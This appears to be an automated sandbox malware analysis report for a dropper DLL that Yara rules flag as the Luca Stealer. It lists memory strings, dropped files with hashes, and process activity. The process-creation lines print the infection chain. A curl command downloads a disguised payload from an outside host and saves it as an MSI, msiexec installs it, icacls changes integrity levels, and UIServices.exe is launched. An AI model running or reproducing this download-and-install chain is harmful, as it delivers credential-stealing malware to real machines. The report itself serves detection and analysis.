Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesX`
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu2
Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Cost5366IO Instructions/sec5368IO Instructions Cost5370HLT Instructions/sec5372HLT Instructions Cost5374MWAIT Instructions/sec5376MWAIT Instructions Cost5378CPUID Instructions/sec5380CPUID Instructions Cost5382MSR Accesses/sec5384MSR Accesses Cost5386Other Intercepts/sec5388Other Intercepts Cost5390External Interrupts/sec5392External Interrupts Cost5394Pending Interrupts/sec5396Pending Interrupts Cost5398Emulated Instructions/sec5400Emulated Instructions Cost5402Debug Register Accesses/sec5404Debug Register Accesses Cost5406Page Fault Intercepts/sec5408Page Fault Intercepts Cost5410Guest Page Table Maps/sec5412Large Page TLB Fills/sec5414Small Page TLB Fills/sec5416Reflected Guest Page Faults/sec5418APIC MMIO Accesses/sec5420IO Intercept Messages/sec5422Memory Intercept Messages/sec5424APIC EOI Accesses/sec5426Other Messages/sec5428Page Table Allocations/sec5430Logical Processor Migrations/sec5432Address Space Evictions/sec5434Address Space Switches/sec5436Address Domain Flushes/sec5438Address Space Flushes/sec5440Global GVA Range Flushes/sec5442Local Flushed GVA Ranges/sec5444Page Tabl
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service'o
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition&
Source: UIServices.exe, 00000039.00000003.437101679.0000018E5A644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cessor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: curl.exe, 0000000A.00000003.257252677.000001840CB50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	Code function: 39_2_00007FFC2356F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		39_2_00007FFC2356F75C
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	Code function: 47_2_00007FFC23C6F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		47_2_00007FFC23C6F75C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOW	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW

Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd&
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndba
Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd7

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

Code function: 39_2_00007FF79738C110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

39_2_00007FF79738C110

Stealing of Sensitive Information

Yara detected Luca Stealer

Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR

Remote Access Functionality

Yara detected Luca Stealer

Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR

ID:	756307
Product:	CloudBasic
Start time:	00:36:14
Start date:	30.11.2022
Sample:	SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	977f29431f9233f22f51b3d27e8abc28
SHA1:	7999931d13db79b25e8660065fbbe5288dc04d7e
SHA256:	b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe
Filetype:	Win64 Dynamic Link Library (generic) (102004/3) 86.43%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\MSIbbb33.LOG	Unicode text, UTF-16, little-endian text, with CRLF line terminators	46EA4744335C356461695433A9B322D3	69D9124F61652D17BD4AA8FE910B528CA0A4E7C1	3ED0958ECB16FA52EB35ADC5E07B413DA555AFEDDB6F59442C25F9AC4B930EEA
C:\Users\user\AppData\Local\Temp\MSIbc4f7.LOG	Unicode text, UTF-16, little-endian text, with CRLF line terminators	DE9A0A76204DD19CF3B390F68AD59B02	D0C7D13A5545F8ACAC8C470652E210E2020D5843	D603AA9474CD94905F55194B6E198F07F918799CC1411B37798A1DA4C95BFADD
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files.cab	Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression	97AF5456199BE2890D17BD4F166ADD0E	4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD	96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmp	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\msiwrapper.ini	data	595F3E1B76CD11D8F02022C1955A277A	9ADEFB19488A4C04C5D8590BAD0784BFB992696E	05B84A681478E0E762D0245CD64F106492EB4AB648AB6E4D6D24A4DF2FCFC5A5
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files.cab	Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression	97AF5456199BE2890D17BD4F166ADD0E	4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD	96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmp	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\msiwrapper.ini	data	9A908CE28600B7D878F5AAF192D86B3B	E389564F74369A7961FFF359E22464E384DD8684	176909712F3D1A7437465C30B5F425971DD71DDAE1D47E79448C6804CFCC1046
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files.cab	Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986, number 1, 175 datablocks, 0x1503 compression	97AF5456199BE2890D17BD4F166ADD0E	4CD664992D1C04B2E2F65F9EF1C8C5B295687ADD	96AFCA733A419F2C4A5DEA6E7569125842477E7300ED9DA8553854A7B11DAD6C
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmp	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)	PE32+ executable (GUI) x86-64, for MS Windows	F65B1FC89A4324BEFDB6F24406BAEF6A	BA820B503D6BC3D9A27C0D5DBD61D8E0DEE166E9	E734882F835EB93A77DC1769C7F57211501AA907889ADC941F87F63725BF4EEB
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)	PE32+ executable (DLL) (console) x86-64, for MS Windows	7A2B8CFCD543F6E4EBCA43162B67D610	C1C45A326249BF0CCD2BE2FBD412F1A62FB67024	7D7CA28235FBA5603A7F40514A552AC7EFAA67A5D5792BB06273916AA8565C5F
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.ini	data	F74603B1A562D052E5B12B357D455AD8	B29185EE5AE86B1A8E8ABC32E1612B9037AD42F6	5997AC1D6E702A55B11BAA3559E10AA56EE3935A9E09E2D8063BBE1AA9D333B1
C:\Users\user\AppData\Local\Temp\spclwow78x.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2	8FF0F8F8BA57670BC5A4BB010BBD4FC3	2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13	3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
C:\Windows\Installer\3bbba0.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2	8FF0F8F8BA57670BC5A4BB010BBD4FC3	2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13	3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
C:\Windows\Installer\3bbba1.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2	8FF0F8F8BA57670BC5A4BB010BBD4FC3	2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13	3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
C:\Windows\Installer\3bbba2.msi	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject: Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date: Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name of Creating Application: MSI Wrapper (10.0.51.0), Security: 2	8FF0F8F8BA57670BC5A4BB010BBD4FC3	2A0EECF5BD6F7B33B8EC4AAB8FE325DDE4068D13	3D644640BF3F0CDB52AD3E920960BB42EB355BBBE31B98A02A6E08027EEA977C
C:\Windows\Installer\MSI1F1E.tmp	data	3EA351398CA787C0B6401D92B2F2D3C9	97216FA3D3C3CE95065C343E93AD5400737D9D61	6C4EA26B46DE751C82061638964D6284173263AA2DF7A22D4FD495DF74446E7B
C:\Windows\Installer\MSI1F4D.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSI24FC.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSI8C81.tmp	data	E478A4D52EDF8ECC02BCEB376B8FEA16	7C5A4DD911D55D542F2DF97AFBC46356C1A59604	B4D6C7475D3A5168083C3CC7688E97599DC51F5F8FB51802770F67D7E3DF235D
